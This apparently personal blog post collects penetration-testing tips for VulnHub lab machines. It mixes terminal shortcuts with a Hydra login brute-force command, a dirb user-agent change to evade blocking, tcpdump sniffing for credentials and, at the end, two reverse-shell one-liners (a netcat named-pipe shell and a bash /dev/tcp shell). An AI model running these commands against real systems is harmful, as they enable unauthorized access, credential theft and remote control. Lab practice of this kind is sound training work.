Reading Time: 3 minutes

Brute Forcing Forms with Hydra

Hydra is more capable than just brute-forcing services, this tool can also brute force web forms.

hydra -v -L mypusers -P /usr/share/wordlists/rockyou.txt -s 8000 127.0.0.1 http-post-form "/login:username=^USER^&password=^PASS^":"F=Failed"

Dirb/DirBuster not returning anything? Change the user-agent.

Some applications can be programmatically set up to deflect penetration testing. In this example, I was using VulnHub: Node and wasn’t getting any responses using Dirb.

(Blocks DirBuster requests)
dirb http://192.168.0.32:3000/ -a "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" /usr/share/wordlists/dirb/big.txt 

Shell Terminal Tricks

Once acquiring a reverse shell you may find that things like “clear” and “reset” don’t work. This may make it more difficult to interact with. By setting the TERM variable this fixes that with ease.

export TERM=xterm

# or you can use grep to find and set
set | grep TERM

Sudo Bang Bang

If you recently ran a command that should have been ran with sudo before it you can re-run that exact command by typing:

sudo !!

Terminal Shortcuts

This video really improved my game when it comes to the terminal.

(YouTube video Linux Shell – How to be FAST)

CTRL + A – moves the cursor to the beginning of the line
CTRL + C – cancels out of current command/application
CTRL + D – delete characters, if no characters it will log you out and close your current terminal session
CTRL + K – deletes everything to end of the line
CTRL + L – clears screen
CTRL + N – navigate forward when using CTRL + P
CTRL + P – pastes previous command
CTRL + R – search through previous commands
CTRL + S – stops output to screen. Useful with long runnings command CTRL + Q – resume output to the screen.
CTRL + U – clears from cursor to beginning of the command
CTRL + Y – yanks
CTRL + X + E – edit current buffer
CTRL + W – deletes word
CTRL + Z – send a process to the background
CTRL + ALT + BACKSPACE – Kill the current server
CTRL + SHIFT + Q – closes current terminal

ALT + B – go left or previous word
ALT + F – go forward or next word
ALT + . – pastes previous command’s argument

Not Getting Enough Results?

Try other tools. Sometimes the other tools will display information the others won’t. It can be mission-critical if you miss a key detail. Here is a list of tools for each process.

Brute Forcing

Hydra, Burp Suite, wfuzz, wpscan, roll your own using Bash/Python/PowerShell

Directory Traversal

Dirb, GoBuster, Dirstalk

Zip Password Cracking

john, fzipcrack

Privilege Escalation

If you’re stuck on finding a privilege escalation here are some things you could try.

Monitoring Internal Traffic

In theory, this would be a go-to on a live server but in a VulnHub sometimes they replicate human behavior by running scripts. You may capture an FTP login credentials by monitoring the data. This data can be downloaded and viewed with WireShark to reveal sensitive information.

# display interfaces
tcpdump -D

# monitor and put all data in cap.pcap file from interface eth0
timeout 200 tcpdump -w cap.pcap -i eth0

LinEnum

https://github.com/rebootuser/LinEnum

If you’ve acquired a shell and can run a script then pull this script and run it. It will give you an enormous amount of information.

Kernel Exploits

Most VulnHubs will be privilege related but occasionally I come across a kernel exploit. Using the commands below you can identify your kernel and look up exploits in Exploit DB.

# how to find out information about the linux kernel
uname -a

cat /proc/version

hostnamectl | grep Kernel

Netcat with no -e option? Use a named pipe!

In an effort to make systems more secure some versions of Netcat do not include the “-e” option. You can get around this by using a named pipe to pipe an interactive shell into Netcat.

I learned this from Dot Dot Slash on the Node 1 Walkthrough

rm /tmp/nce; mkfifo /tmp/nce; cat /tmp/nce | /bin/sh -i 2>&1 | nc 192.168.0.23 443 > /tmp/nce
# or use bash
bash -i >& /dev/tcp/192.168.1.69/443 0>&1